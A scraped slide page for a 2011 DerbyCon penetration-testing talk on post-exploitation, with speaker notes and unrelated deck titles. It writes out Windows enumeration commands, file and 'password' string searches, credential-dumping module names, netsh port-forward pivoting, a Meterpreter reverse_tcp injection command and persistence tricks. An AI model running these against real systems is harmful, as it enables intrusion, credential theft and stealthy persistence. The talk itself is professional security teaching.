Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piece
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
The Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfThe Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdf
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 

The Dirty Little Secrets They Didn’t Teach You In Pentesting Class

  • 1. The Dirty Little Secrets They Didn’t Teach You In Pentesting Class DerbyCon 2011
  • 2. meterpreter> getuid Chris Gates (CG) Twitter carnal0wnage Blog carnal0wnage.attackresearch.com Job Partner/Principal Security Consultant at Lares Affiliations  Attack Research, Metasploit Work Previous Talks Attack Oracle (via web) wXf Web eXploitation Framework Open Source Information Gathering Attacking Oracle (via TNS) Client-Side Attacks
  • 3. meterpreter> getuid Rob Fuller (mubix) Twitter -> mubix Blog -> http://www.room362.com Job -> Penetration Tester for Rapid7 Previous Talks Networking for Penetration Testers Metasploit Framework/Pro Training for Rapid7 Deep Magic 101 Couch to Career in 80 hours
  • 4. The setup… We do things You do things There’s a better way to do things* Because ‘they’ do them that way Or… now they will because you are some of ‘they’ Use what you works for you
  • 5. Domain Admin Or Bust Usually this means adding yourself as one (aka fastest way to get caught) Really just about measuring…
  • 6. Pentesting Goals What’s our goal? Vulnerability Driven vs. Data Driven vs. Capability Driven pentest/goal What’s a *good* goal? Domain Admin is “A Goal” but it’s a stupid goal. What makes the client money is a better goal (if you* can identify it) Problems arise in actually identifying this. What’s important to testers vs client vs bad guys… Best goal, testing client’s ability to detect & respond to various levels of attackers
  • 7. Majority of ‘Pentesting’ going on today…
  • 8. Majority of ‘Pentesting’ going on today… Look I got 500+ shells! And?
  • 9.
  • 10. Is it working? Who got 0wned? Northrop Grumman: http://www.foxnews.com/scitech/2011/05/31/northrop-grumman-hit-cyber-attack-source-says/ Lockheed Martin: http://packetstormsecurity.org/news/view/19242/March-RSA-Hack-Hits-Lockheed-Remote-Systems- Breached.html L3: http://threatpost.com/en_us/blogs/report-l3-warns-employees-attacks-using-compromised-securid-tokens-060111 Booz Allen Hamilton: http://gizmodo.com/5820049/anonymous-leaks-90000-military-email-accounts-in-latest-antisec-attack SAIC(older): http://www.usatoday.com/news/nation/2007-07-20-saic-security_N.htm
  • 11. Is it working? Who got 0wned? (recently) DigiNotar: http://www.rijksoverheid.nl/ministeries/bzk/documenten-en-publicaties/rapporten/2011/09/05/diginotar-public-report-version-1.html Texas Police: http://pastebin.com/LGyeLcun Japan Mitsubishi Heavy Industries: http://www.theregister.co.uk/2011/09/22/japan_military_hack_follow_up/ Everyone else (via RSA Employee #15666): http://pastebin.com/yKSQd5Z5 http://hbgary.anonleaks.ch/greg_hbgary_com/26996.html
  • 12. Is it working? Interaction Time!
  • 13. A Better way? http://www.secmaniac.com/files/BSides-StrategicPT-Final.pdf
  • 15. Actual Attack Scenarios (best case)
  • 16. k, enough fiddle faddle… IT Security Industry is currently focused on minimizing the presence of vulnerabilities Consider a change in focus to what attacker tactics/techniques you can detect and respond to Let’s call this “Capability Driven Security Assessments” See my BruCon talk with Joe McCray To do this we need to ramp up post exploitation and stealth
  • 17. vs
  • 19. Prep Work Prep work, its awesome, show it some love… Make your click scripts Update your stuff Have script and screen ready to go
  • 20. How many of you have lost a shell because _your_ connection died?
  • 21. Screen No, not like drug screen… “Screen is a full-screen window manager that multiplexes a physical terminal between several processes, typically interactive shells.”
  • 22. Screen Commands and Keyboard Shortcuts screen –S mycustomer CTRL-A then D (Detach) screen –ls screen –x –d mycustomer attaches to ‘mycustomer’ screen detaches other ‘attached’ sessions CTRL-A :multiuser on (Does not work on Debian based)
  • 23. How many of you have lost a data because your scrollback wasn’t set to be long enough?
  • 24. Script No, not like java script… Logs all your stuff Use it user@ubuntu:~$ script clientname.txt Script started, file is clientname.txt user@ubuntu:~$ exit exit Script done, file is clientname.txt user@ubuntu:~$
  • 26. Discovery Finding stuff to lay the smack down on
  • 27. Quick Tangent Passwords Your passwords suck
  • 28. Your passwords suck One of these passwords almost always works… OK back to it….
  • 29. Nmap Scripts Obligatory nod to nmap scripts Best scripts don’t fire off automatically with “-A” Some of the cooler scripts… Citrix, NFS, AFP, SNMP, LDAP awesome Database coverage http* Lots of handy stuff, some overlap with MSF aux but some things aux doesn’t have. Go See Ron’s talk on Sunday
  • 30. Nmap Scripts (removed citrix-enum-app-xml pic)
  • 32. Nmap Scripts Oracle http://seclists.org/nmap-dev/2011/q3/546
  • 33. Nmap Scripts Ldap http://seclists.org/nmap-dev/2011/q3/510
  • 34. MSF Auxiliary Modules Metasploit Aux modules are awesome Handle all the BS for you Uses lib/rex ==“Ruby EXploitationlibrary” Basic library for most tasks Sockets, protocols, command shell interface SSL, SMB, HTTP, XOR, Base64, random text Intended to be useful outside of the framework Lib/rex ported to a ruby gem! Can make use of rex outside of MSF if so desired
  • 35. MSF Auxiliary Modules Designed to help with reconnaissance Dozens of useful service scanners Simple module format, easy to use Specify THREADS for concurrency Keep this under 16 for native Windows 256 is fine on Linux Uses RHOSTS instead of RHOST
  • 36. MSF Auxiliary Modules Uses OptAddressRangeoption class, similar to nmap host specification 192.168.0.1,3,5-7 Standard ranges 192.168.1-7.230 Same IP on multiple subnets 192.168.0.* 0-255 www.metasploit.com/24 0-255 for whatever this resolves to file:/tmp/ranges.txt Line separated list of targets
  • 39. MSF Auxiliary Modules Write your own to solve problems on the fly You should have been in egyp7’s training
  • 41. Exploitation We seem ok at this already… Considering it covered… Open my email…click that link…you know you want to…k thx bye
  • 43. Post Exploitation Google Docs http://www.room362.com/blog/2011/9/6/post-exploitation-command-lists.html Or http://bitly.com/qrbKQP Open Source (Anyone can edit them) Will always be public (might have to lock down the edit privs based on defacement rate)
  • 44. What is the best persistence method? Meterpreter? HTTPS Pro’s Persistence Agent MOS_DEF? Thunderbird SPAM Persistence DNS, HTTP, HTTPS, etc CORE Agent? Wiz-bang custom binary/backdoor? RAT (probably backdoored in other ways)
  • 45. Nah… this is better
  • 47. More on that later…
  • 48. Hooking your homies up run multi_meter_inject -pt windows/meterpreter/reverse_tcp -mr1.2.3.4 -p 80 Multi-user functionality with armitage/msf pro
  • 50. GOOD Nmap Ping Nessus Nexpose Angry IP Scanner? “net view /domain”
  • 51. BETTER OSQL DSQUERY / DSGET (Annoying) (Joeware) ADFind (less annoying) nltest
  • 52. BETTER OSQL osql –L Lists all MS SQL servers
  • 53. BETTER DSQUERY / DSGET (Annoying) dsquery computer -limit 0 current domain dsqueryuser -limit 0 dsquery computer -limit 0 "DC=company,DC=net" dsquery user -limit 0 "DC=company,DC=net“ other domain Or use adfind (joeware)
  • 54. BETTER nltest Keeps trying to get you info if one path fails
  • 55. What if CMD.exe is disabled?
  • 56.
  • 57. But… dropping binaries == bad Damn you forensics people! (On exception binaries that blend in)
  • 58. BEST Use the underlying API Railgun Demo Route ARPTable TCPTable
  • 59. Route
  • 62. BEST (Cont’d) Explain NetDiscovery Demo NetDiscovery Highlight SQL, DC, UNIX, Novell selections Explain DomainDiscovery Demo DomainDiscovery
  • 64. Quick Tangent Dig mini NetDiscovery for just one hostname
  • 65. DomainDiscovery What domains do you have access to? Are they domains? What are the names of all their domain controllers?
  • 67. GOOD net group “domain admins” /domain net group “domain admins” /domain:DM net localgroup Administrators net group localgroup Administrators /domain net user domainadmin_username /domain net user username /domain
  • 68. BETTER Rpcclient Enumerate users #!/bin/bash for i in {500..600} do rpcclient -U “user%Password1" -W DOMAIN 1.2.3.4 -c "lookupsids S-1-5-21-1289870825-1602939633-2792175544-$i done
  • 70. BEST Explain UserDiscovery Demo UserDiscovery Explain DisplaySessions Demo DisplaySessions PVE-Find-AD-User https://www.corelan.be/index.php/my-free-tools/ad-cs/pve-find-ad-user/
  • 71. UserDiscovery Sorry no screenie
  • 73. Creating Zombies RunAs ShellExecute, CreateProcessWithLogon, LogonUser WCE + runhash32/64 user level psexec == zombie user & token
  • 74. DEMO Run executable in memory
  • 75. Privilege Escalation Remember, you don’t HAVE to do this phase…
  • 76. GOOD getsystem Post modules Keyboard layout Bypassuac Core Impact / Canvas ship with locals Honestly a big lacking area for MSF 
  • 77. getsystem has options, use themor loose shells
  • 78. BETTER? Explain DomainDrop client.railgun.netapi32.NetUnjoinDomain(nil,nil,nil,nil)
  • 79. BEST Just ask for it… Explain ‘Ask’ module Looking for the user that has the $stuff Tasklist tasklist /V /S $IP /U $user /P $password for /F "skip=3 delims=" %A in ('net view') do tasklist /V /S %A /U $user /P $password
  • 81. BEST Just ask for it… Explain ‘Ask’ module Looking for the user that has the $stuff Tasklist tasklist /V /S $IP /U $user /P $password for /F "skip=3 delims=" %A in ('net view') do tasklist /V /S %A /U $user /P $password
  • 82. Finding the Hope Locating the data that actually matters…
  • 83. Searching for Gold (Good) Dir /s “My Documents” Dir /s “Desktop” Dir /s *.pcf ListDrives
  • 84. Searching for Gold (Good) Searching for files dir c:password* /s dir c:competitor* /s dir c:finance* /s dir c:risk* /s dir c:assessment* /s dir c:.key* /s dir c:.vsd /s dir c:.pcf /s dir c:.ica /s dirc:.crt /s dir c:.log /s Search in files findstr /I /N /S /P /C:password * findstr /I /N /S /P /C:secret * findstr /I /N /S /P /C:confidential * findstr /I /N /S /P /C:account * Powershell/WMIC to do it
  • 85. Searching for Gold (Better) Dumplinks GetFirefoxCreds GetPidginCreds Outlook, IE, Chrome, RDP Password Extraction Basically the whole ‘credentials’ post module section SharePoint Intranet.company.com Shouts to illwill, Kx499, thelightcosine
  • 86. Searching for Gold (Best) OpenDLP Fiction’s Database Searcher Search in Meterpreter Uses windows indexing i.e. outlook email Dir /s $share > filetosearchoffline.txt Findstr too  Do what works for you…click scripts rule
  • 87. PIVOTING Kind dumb to stay on the initial point of entry…
  • 88. Portforwarding Meterpreterportfwd Route Sock4a module + meterpreter session Pro VPN Pivot? Portproxy Built into Windows netsh interface portproxy>add v4tov4 listenport=25 connectaddress=192.168.0.100 connectport=80 protocol=tcp Legitimate Access via VPN, Term Server, Citrix, etc
  • 89. PERSISTENCE One week isn’t showing impact of internal awareness…
  • 90. Microsoft has an app for that… Autoruns
  • 91. These won’t show up there… Smartlocker -> lockout_recorder http://blog.metasploit.com/2010/12/capturing-windows-logons-with.html Fxsst.dll https://blog.mandiant.com/archives/1786 http://www.room362.com/blog/2011/6/27/fxsstdll-persistence-the-evil-fax-machine.html Explain gpo_dropperhbgary http://www.hbgary.com/malware-using-local-group-policy Explain IPv6 Dropper http://hak5.org/hack/ipv6-from-the-pentesters-perspective
  • 92.
  • 94. Chris Gates carnal0wnage Rob Fuller mubix

Notas do Editor

  1. Chris*How I do shit MAY not be better for you…but you’re here. So hopefully it will helpWhat the collective we are doing so far, obviouslyisnt working.
  2. Rob
  3. You == the tester, the client, the consultantChris
  4. Rob
  5. Chris
  6. Chris
  7. Chris
  8. Chris
  9. Rob
  10. “there is no spoon” moment, where we talk about how pivoting, persistence, and post exploitation are just parts of the normal cycleRob
  11. Chris
  12. Chris
  13. Rob
  14. Chris
  15. Rob
  16. Rob
  17. Rob
  18. Chris
  19. Chris
  20. remember that your passwords suckChris
  21. ChrisScript arguements
  22. Chris
  23. Chris
  24. Chris
  25. Chris
  26. Chris & Rob with table example
  27. Chris
  28. Chris
  29. Chris
  30. Chris
  31. Chris
  32. Rob
  33. Rob
  34. Rob
  35. Getting shells, keeping shells, keeping a backup shellKick yourself a shell before you do stupid shellKeep a host where you have a shell in case everything goes to hellChris
  36. Rob
  37. This slide not in public deck!
  38. chris
  39. chris
  40. Push up ‘mycmd.exe’ / command.com 16bit bypassRob then Chris
  41. rob
  42. rob
  43. Rob
  44. ChrisSharing domain accounts across domainsLook for Enterprise admins
  45. If you need help getting the SID…well…googlechris
  46. Chris
  47. rob
  48. rob
  49. rob
  50. chris
  51. Chris
  52. Chris
  53. Chris
  54. ChrisStory 1: Shared drives with Everyone accessStory 2: LophtCrack password dump with Admin Share
  55. ChrisKey is using windows tools to move around and find stuff. But also use custom tools to find stuff.Powershell search string stuffOpenDLPpsexec set EXE::Custom Operator vs Attacker (look at it on target, vsexfil then hand off to analyst)
  56. Rob
  57. Chris
  58. Rob